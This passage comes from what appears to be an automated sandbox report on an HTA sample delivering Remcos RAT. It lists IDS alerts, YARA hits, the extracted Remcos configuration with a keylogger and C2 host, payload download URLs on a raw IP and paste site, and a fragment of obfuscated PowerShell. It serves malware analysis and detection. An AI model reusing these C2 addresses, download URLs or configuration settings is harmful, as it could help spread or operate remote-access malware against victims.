Vx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2916, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.cmdline", ProcessId: 1772, ProcessName: csc.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 6456, TargetFilename: C:\ProgramData\remcos\logs.dat
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T07:21:44.801573+010020204251Exploit Kit Activity Detected172.67.187.200443192.168.2.449738TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T07:21:44.801573+010020204241Exploit Kit Activity Detected172.67.187.200443192.168.2.449738TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T07:21:57.084620+010020365941Malware Command and Control Activity Detected192.168.2.449739192.169.69.266946TCP
                        2024-12-17T07:22:08.564509+010020365941Malware Command and Control Activity Detected192.168.2.449740192.169.69.266946TCP
                        2024-12-17T07:22:20.200940+010020365941Malware Command and Control Activity Detected192.168.2.449753192.169.69.266946TCP
                        2024-12-17T07:22:31.873036+010020365941Malware Command and Control Activity Detected192.168.2.449784192.169.69.266946TCP
                        2024-12-17T07:22:43.555999+010020365941Malware Command and Control Activity Detected192.168.2.449810192.169.69.266946TCP
                        2024-12-17T07:22:55.211999+010020365941Malware Command and Control Activity Detected192.168.2.449838192.169.69.266946TCP
                        2024-12-17T07:23:07.099862+010020365941Malware Command and Control Activity Detected192.168.2.449866192.169.69.266946TCP
                        2024-12-17T07:23:18.583642+010020365941Malware Command and Control Activity Detected192.168.2.449892192.169.69.266946TCP
                        2024-12-17T07:23:30.068736+010020365941Malware Command and Control Activity Detected192.168.2.449921192.169.69.266946TCP
                        2024-12-17T07:23:41.749565+010020365941Malware Command and Control Activity Detected192.168.2.449949192.169.69.266946TCP
                        2024-12-17T07:23:53.351952+010020365941Malware Command and Control Activity Detected192.168.2.449975192.169.69.266946TCP
                        2024-12-17T07:24:04.909511+010020365941Malware Command and Control Activity Detected192.168.2.450004192.169.69.266946TCP
                        2024-12-17T07:24:16.602389+010020365941Malware Command and Control Activity Detected192.168.2.450018192.169.69.266946TCP
                        2024-12-17T07:24:28.166564+010020365941Malware Command and Control Activity Detected192.168.2.450019192.169.69.266946TCP
                        2024-12-17T07:24:39.842936+010020365941Malware Command and Control Activity Detected192.168.2.450020192.169.69.266946TCP
                        2024-12-17T07:24:51.460414+010020365941Malware Command and Control Activity Detected192.168.2.450021192.169.69.266946TCP
                        2024-12-17T07:25:02.967464+010020365941Malware Command and Control Activity Detected192.168.2.450022192.169.69.266946TCP
                        2024-12-17T07:25:14.603911+010020365941Malware Command and Control Activity Detected192.168.2.450023192.169.69.266946TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T07:21:26.187158+010020490381A Network Trojan was detected151.101.193.137443192.168.2.449731TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T07:21:45.761639+010028582951A Network Trojan was detected172.67.187.200443192.168.2.449738TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T07:21:15.185736+010028587951A Network Trojan was detected192.168.2.44973023.95.235.2980TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T07:21:44.389034+010028410751Malware Command and Control Activity Detected192.168.2.449738172.67.187.200443TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: submarrine.duckdns.orgAvira URL Cloud: Label: malware
                        Source: 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["submarrine.duckdns.org:6946:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GH3PRL", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                        Source: sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaVirustotal: Detection: 26%Perma Link
                        Source: sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaReversingLabs: Detection: 15%
                        Source: Yara matchFile source: 7.2.powershell.exe.63d2830.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.powershell.exe.63d2830.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4168215268.000000000258F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2097314015.0000000006332000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6312, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6456, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_0043293A
                        Source: powershell.exe, 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_a43bcee6-8

                        Exploits

                        barindex
                        Source: Yara matchFile source: 7.2.powershell.exe.63d2830.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.powershell.exe.63d2830.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2097314015.0000000006332000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6312, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6456, type: MEMORYSTR

                        Privilege Escalation

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406764 _wcslen,CoGetObject,12_2_00406764

                        Phishing

                        barindex
                        Source: Yara matchFile source: sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta, type: SAMPLE
                        Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.4:49738 version: TLS 1.2
                        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1826688509.00000000033AC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.2097314015.000000000600C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2139243463.0000000006F4B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2136722532.00000000069C0000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnetihascustomattributeczprocess_informationcxcydnlib.dotnet.mdrawassemblyrefrowhmdnlib.dotnet.writermethodbodychunkshlmicrosoft.win32.taskschedulernetworksettingshohnhihhhkhjhehdhghfhamicrosoft.win32.taskschedulertaskschedulersnapshothchbcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypefa`1hyhxdnlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowhzmicrosoft.win32.taskschedulertaskhuhthwdnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvt
                        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.2097314015.000000000600C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.pdb source: powershell.exe, 00000003.00000002.1827619214.00000000056FA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.2097314015.000000000600C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.2097314015.000000000600C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000007.00000002.2097314015.000000000600C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2139243463.0000000006F4B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2136722532.00000000069C0000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.2097314015.000000000600C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2139243463.0000000006F4B000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.2097314015.000000000600C000.00000004.00000800.00020000.00000000.sdmp
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06

                        Software Vulnerabilities

                        barindex
                        Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49730 -> 23.95.235.29:80
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49740 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49739 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49784 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49810 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49838 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49866 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49753 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49892 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49921 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49975 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49949 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50004 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50021 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50019 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50020 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50023 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50022 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50018 -> 192.169.69.26:6946
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 172.67.187.200:443 -> 192.168.2.4:49738
                        Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.67.187.200:443 -> 192.168.2.4:49738
                        Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.67.187.200:443 -> 192.168.2.4:49738
                        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.193.137:443 -> 192.168.2.4:49731
                        Source: Malware configuration extractorURLs: submarrine.duckdns.org
                        Source: unknownDNS query: name: paste.ee
                        Source: unknownDNS query: name: submarrine.duckdns.org
                        Source: Yara matchFile source: 7.2.powershell.exe.60d4190.1.raw.unpack, type: UNPACKEDPE
                        Source: global trafficHTTP traffic detected: GET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /r/HtMmw/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
                        Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
                        Source: Joe Sandbox ViewIP Address: 23.95.235.29 23.95.235.29
                        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                        Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49738 -> 172.67.187.200:443
                        Source: global trafficHTTP traffic detected: GET /439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.29Connection: Keep-Alive
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_034D7A18 URLDownloadToFileW,3_2_034D7A18
                        Source: global trafficHTTP traffic detected: GET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /r/HtMmw/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.29Connection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                        Source: global trafficDNS traffic detected: DNS query: paste.ee
                        Source: global trafficDNS traffic detected: DNS query: submarrine.duckdns.org
                        Source: powershell.exe, 00000003.00000002.1827619214.00000000056FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/439/weareusi
                        Source: powershell.exe, 00000003.00000002.1827619214.00000000056FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1832186474.0000000007862000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1832186474.0000000007908000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1834189157.0000000008800000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1826688509.000000000333D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIF
                        Source: powershell.exe, 00000003.00000002.1834189157.0000000008800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIF2
                        Source: powershell.exe, 00000003.00000002.1826688509.00000000033AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFC:
                        Source: powershell.exe, 00000003.00000002.1832186474.0000000007862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFCA
                        Source: powershell.exe, 00000003.00000002.1832186474.0000000007862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFP
                        Source: powershell.exe, 00000003.00000002.1826688509.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFRLLMEM
                        Source: powershell.exe, 00000003.00000002.1834189157.0000000008800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFT
                        Source: powershell.exe, 00000003.00000002.1832186474.0000000007862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFf
                        Source: powershell.exe, 00000003.00000002.1832186474.0000000007862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIFpaniesforgifitingbe
                        Source: CasPol.exeString found in binary or memory: http://geoplugin.net/json.gp
                        Source: powershell.exe, 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2097314015.0000000006332000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
